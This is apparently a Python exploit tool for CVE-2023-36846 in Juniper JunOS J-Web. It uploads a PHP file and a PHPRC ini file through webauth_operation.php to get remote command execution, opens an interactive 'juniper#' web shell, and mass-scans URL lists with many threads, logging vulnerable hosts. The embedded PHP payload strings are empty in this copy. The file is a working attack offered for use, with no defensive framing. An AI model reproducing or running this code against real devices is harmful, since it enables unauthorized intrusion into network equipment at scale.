import re import os import base64 import urllib3 import argparse import requests import concurrent.futures from threading import Lock from rich.console import Console from alive_progress import alive_bar from prompt_toolkit import PromptSession from prompt_toolkit.formatted_text import HTML from prompt_toolkit.history import InMemoryHistory urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) class BalgoExploit: def __init__(self, url, output): self.url = url self.console = Console() self.output = output self.verbose = bool(self.output) def upload_php(self, php_payload): php_payload_bytes = php_payload.encode('ascii') php_payload_base64 = base64.b64encode(php_payload_bytes).decode('ascii') upload_request_url = f"{self.url}/webauth_operation.php" headers = {"Content-Type": "application/x-www-form-urlencoded"} data = { "rs": "do_upload", "rsargs[0]": f"[{{\"fileData\":\"data:text/html;base64,{php_payload_base64}\",\"fileName\":\"watchTowr.php\",\"csize\":{len(php_payload)}}}]" } response = requests.post(upload_request_url, headers=headers, data=data, verify=False, timeout=5) uploaded_file = re.findall("0\: '(.*?)'\},", response.text) if not uploaded_file and not self.verbose: self.console.print(f"[bold red][-] Failed to upload php file for {self.url}[/bold red]") return None return str(uploaded_file[0]) def upload_ini(self, php_path): ini_payload = f'auto_prepend_file="/var/tmp/{php_path}"' ini_payload_bytes = ini_payload.encode('ascii') ini_payload_b64 = base64.b64encode(ini_payload_bytes).decode('ascii') ini_request_url = f"{self.url}/webauth_operation.php" headers = {"Content-Type": "application/x-www-form-urlencoded"} data = { "rs": "do_upload", "rsargs[0]": f"[{{\"fileData\":\"data:plain/text;base64,{ini_payload_b64}\",\"fileName\":\"watchTowr.ini\",\"csize\":{len(ini_payload)}}}]" } response = requests.post(ini_request_url, headers=headers, data=data, verify=False, timeout=5) uploaded_ini = re.findall("0\: '(.*?)'\},", response.text) if not uploaded_ini and not self.verbose: self.console.print(f"[bold red][-] Failed to upload ini file for {self.url}[/bold red]") return None return uploaded_ini[0] def execute_webshell(self, ini_file, cmd): exec_url = f"{self.url}/webauth_operation.php?PHPRC=/var/tmp/{ini_file}&0={cmd}" response = requests.get(exec_url, verify=False, timeout=5) matches = re.findall("\[S\](.*?)\[E\]", response.text, re.DOTALL) return matches[0].strip() if matches else None def run(self, cmd, delete=None): php_payload = f"" php_path = self.upload_php(php_payload) ini_file = self.upload_ini(php_path) if any(value is None for value in [php_path, ini_file]): return None result = self.execute_webshell(ini_file, cmd) if result and self.output: with open(self.output, "a") as f: f.write(self.url + "\n") if delete: self.execute_webshell(ini_file, f"delete=1") return result class JunosShell: def __init__(self, exploit): self.exploit = exploit self.console = Console() def interactive_shell(self, ini_file): self.console.print("\n[bold magenta][*] Entering JunOS interactive shell mode...[/bold magenta]") session = PromptSession(history=InMemoryHistory()) while True: try: command = session.prompt(HTML('juniper# ')) if command.lower() in ["exit", "quit"]: self.exploit.execute_webshell(ini_file, f"delete=1") self.console.print("[bold yellow][!] Exiting JunOS shell and cleaning up...[/bold yellow]") break elif "clear" in command: os.system('clear') if os.name == 'posix' else os.system('cls') else: result = self.exploit.execute_webshell(ini_file, command) self.console.print(f"[bold green][-] Execution Results:[/bold green]\n[bold yellow]{result}[/bold yellow]") except KeyboardInterrupt: self.exploit.execute_webshell(ini_file, f"delete=1") self.console.print("[bold yellow][!] Exiting JunOS shell and cleaning up...[/bold yellow]") break def check_vulnerability(url, output=None): exploit = BalgoExploit(url, output) try: response = exploit.run("echo Vulnerable", delete=True) if response is None: if not exploit.verbose: exploit.console.print(f"[bold red][X] {url} does not seem to be vulnerable![/bold red]") return False exploit.console.print( f"[bold red][+] {url} is vulnerable to CVE-2023-36846[/bold red]\n" f"[bold green][-] Extracted Output:[/bold green] " f"[bold yellow]{response}[/bold yellow]" ) if output: with open(output, "a") as f: f.write(url + "\n") return True except: pass def main(): parser = argparse.ArgumentParser() parser.add_argument("-t", "--threads", type=int, default=50, help="Number of threads for concurrent scanning") parser.add_argument("-o", "--output", help="Output file") parser.add_argument("-f", "--file", help="Input file containing list of URLs") parser.add_argument("-u", "--url", help="Target url in the format https://localhost") args = parser.parse_args() if args.url: is_vulnerable = check_vulnerability(args.url, args.output) if is_vulnerable: exploit = BalgoExploit(args.url, args.output) php_payload = f"" php_path = exploit.upload_php(php_payload) ini_file = exploit.upload_ini(php_path) junos_shell = JunosShell(exploit) junos_shell.interactive_shell(ini_file) elif args.file: with open(args.file, "r") as f: urls = [url.strip() for url in f.readlines()] bar_lock = Lock() def safe_check_vulnerability(url, output): check_vulnerability(url, output) with bar_lock: bar() with alive_bar(len(urls), title="Processing URLs") as bar: with concurrent.futures.ThreadPoolExecutor(max_workers=args.threads) as executor: executor.map(safe_check_vulnerability, urls, [args.output] * len(urls)) if __name__ == "__main__": main()